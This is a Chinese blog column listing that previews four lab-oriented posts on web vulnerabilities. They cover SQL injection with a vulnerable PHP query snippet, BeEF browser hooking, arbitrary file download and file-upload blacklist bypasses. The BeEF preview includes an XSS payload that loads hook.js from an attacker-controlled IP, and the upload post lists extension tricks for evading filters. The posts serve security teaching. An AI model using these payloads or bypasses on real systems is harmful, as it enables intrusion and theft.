![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
常见漏洞
文章平均质量分 50
pigzlfa
这个作者很懒,什么都没留下…
展开
-
SQL注入
预备知识:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。常见的SQL注入漏洞关键代码如下:$sql = "SELECT * FROM news WHERE id=";$sql . = $_GET['id'];$result = mysql_query($s原创 2021-07-06 22:54:56 · 86 阅读 · 0 评论 -
kali beef的使用
beef的安装可以直接安装也可以从源码安装,略beef安装好后,打开web登陆页面http://192.168.102.130:3000/ui/panelurl为kali机地址,可以从配置文件中修改3.把js加载进存在xss的地方(例pikachu)payload: <script src='http://192.168.102.130:3000/hook.js'></script>可以看到在不停的向102.130发起请求使用beef中终端发送弹窗.原创 2021-07-05 23:28:39 · 416 阅读 · 0 评论 -
任意文件下载漏洞
定义:文件下载漏洞是指文件下载功能没有对下载的文件类型,目录做合理严谨的过滤,导致用户可以下载服务器上的任意文件利用:获得站点源码(黑盒->白盒)获得站点与中间件配置文件获得应用与系统配置文件(ssh、myaql)防御:1、下载路径不可控,而是程序自动生成后保存在数据库中,根据ID进行下载2、对参数做严格的过滤,不能进行目录遍历(穿越)实验目标通过实验获得系统根目录下flag.php里面key的内容。key内容为DBApp{}内的字符串点进下载地址,跳转到下载页面在地址栏原创 2021-07-05 18:07:30 · 1528 阅读 · 0 评论 -
文件上传之黑名单绕过
黑名单绕过方法:1、大小写绕过windows对大小写不敏感,所以上传大小写混写的php进行绕过(因为后端一般验证后缀字符串是否和‘php’相等,(前提是没有将你传入的字符串进行小写转换后再对比),大写字母和小写字母肯定不相等,所以可以利用这一点进行绕过,又因为windows对大小写不敏感,所以.PhP文件被当成php文件解析)2、重写绕过:服务端将黑名单的后缀名替换为空,但是仅替换一次,所以可以上传.phphp p后缀,替换后就成了.php3、特殊可解析后缀绕过:黑名单规则不严谨,在某些特定.原创 2021-07-04 22:15:55 · 5681 阅读 · 2 评论